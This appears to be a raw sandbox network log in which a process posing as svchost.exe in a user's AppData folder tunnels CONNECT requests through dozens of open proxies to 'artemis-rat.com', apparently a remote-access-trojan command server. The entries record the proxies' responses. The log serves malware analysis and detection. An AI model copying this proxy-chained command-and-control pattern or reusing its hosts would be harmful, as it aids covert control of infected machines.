Mar 9, 2024 13:14:33.087521076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.846231937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3033	192.168.2.5	57633	92.204.135.37	63462	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.088774920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.380182981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3034	192.168.2.5	59855	104.21.218.103	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.088855982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.243143082 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3035	192.168.2.5	59192	115.96.208.124	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.091692924 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3036	192.168.2.5	59803	43.128.146.42	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.095671892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3037	192.168.2.5	59801	82.137.244.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.095772982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3038	192.168.2.5	59866	162.214.170.144	39503	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.096263885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.676963091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3039	192.168.2.5	59882	38.162.3.50	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.147835970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.677222013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.094505072 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3040	192.168.2.5	58024	8.210.8.157	19001	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.148457050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3041	192.168.2.5	59608	180.250.159.49	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.151710033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.536485910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3042	192.168.2.5	58959	117.160.250.131	8899	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.152141094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.845141888 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3043	192.168.2.5	59857	114.129.2.82	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.154886961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.419787884 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3044	192.168.2.5	59827	20.24.43.214	8123	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.167402029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.503391027 CET	314	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: close Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3045	192.168.2.5	59807	91.107.180.250	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.167579889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3046	192.168.2.5	59453	68.71.247.130	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.170129061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3047	192.168.2.5	59833	194.247.173.17	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.174689054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3048	192.168.2.5	59860	139.162.224.37	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.181077003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3049	192.168.2.5	59808	203.171.19.98	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.184026957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.546619892 CET	503	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 09 Mar 2024 12:15:08 GMT Connection: close Content-Length: 324 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3050	192.168.2.5	59279	138.36.150.15	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.203156948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.833575964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.536767960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.833658934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3051	192.168.2.5	59274	61.19.145.66	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.203309059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.319679976 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3052	192.168.2.5	59197	140.238.245.116	8100	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.215733051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.176908016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.380583048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3053	192.168.2.5	59888	192.154.246.96	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.246718884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3054	192.168.2.5	59381	52.151.210.204	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.264764071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3055	192.168.2.5	59869	119.23.148.173	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.265736103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3056	192.168.2.5	59830	93.171.220.229	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.266591072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.677398920 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3057	192.168.2.5	59312	167.71.5.83	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.267235994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3058	192.168.2.5	57906	162.214.90.49	34409	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.269776106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.374130964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3059	192.168.2.5	59877	118.184.157.111	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.270015955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.618859053 CET	321	IN	HTTP/1.1 400 Bad Request Server: openresty/1.21.4.2 Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 163 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3060	192.168.2.5	59893	199.188.93.214	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.270021915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3061	192.168.2.5	59335	193.84.89.202	8443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.270162106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3062	192.168.2.5	59861	64.43.89.82	6341	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.270371914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.626559019 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3063	192.168.2.5	59902	172.67.181.144	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.270402908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
